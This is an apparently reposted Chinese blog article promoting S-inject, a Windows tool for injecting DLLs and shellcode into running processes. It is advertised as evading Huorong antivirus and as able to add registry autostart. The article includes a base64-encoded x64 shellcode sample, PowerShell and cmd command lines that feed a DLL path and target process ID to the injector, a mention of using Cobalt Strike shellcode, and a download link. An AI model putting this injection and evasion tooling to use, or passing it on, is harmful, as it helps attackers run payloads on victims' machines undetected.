DLL+Shellcode的Windows注入免杀工具

admin 2024年2月16日08:26:35评论21 views字数 977阅读3分15秒阅读模式

0x01 工具介绍

远程shellcode注入等功能可免杀火绒,VNC无感,可注册表添加开机自启动。

0x02 安装与使用

一、Shellcode注入

这里以64为windows10版本Calc shellcode位例子(虽然会崩溃) shellcode来源:https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode base64编码后shellcode

SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==

DLL+Shellcode的Windows注入免杀工具

以CobaltStrike Shellcode为例子

DLL+Shellcode的Windows注入免杀工具

 

DLL+Shellcode的Windows注入免杀工具

二、DLL注入

powershell

echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>#echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe

DLL+Shellcode的Windows注入免杀工具

cmd,推荐使用powershell启动

powershell -c echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>#powershell -c echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe

三、免杀效果

DLL+Shellcode的Windows注入免杀工具

 

DLL+Shellcode的Windows注入免杀工具

0x03 项目链接下载

https://github.com/Joe1sn/S-inject

原文始发于微信公众号(Web安全工具库):DLL+Shellcode的Windows注入免杀工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月16日08:26:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DLL+Shellcode的Windows注入免杀工具http://cn-sec.com/archives/2498319.html

发表评论

匿名网友 填写信息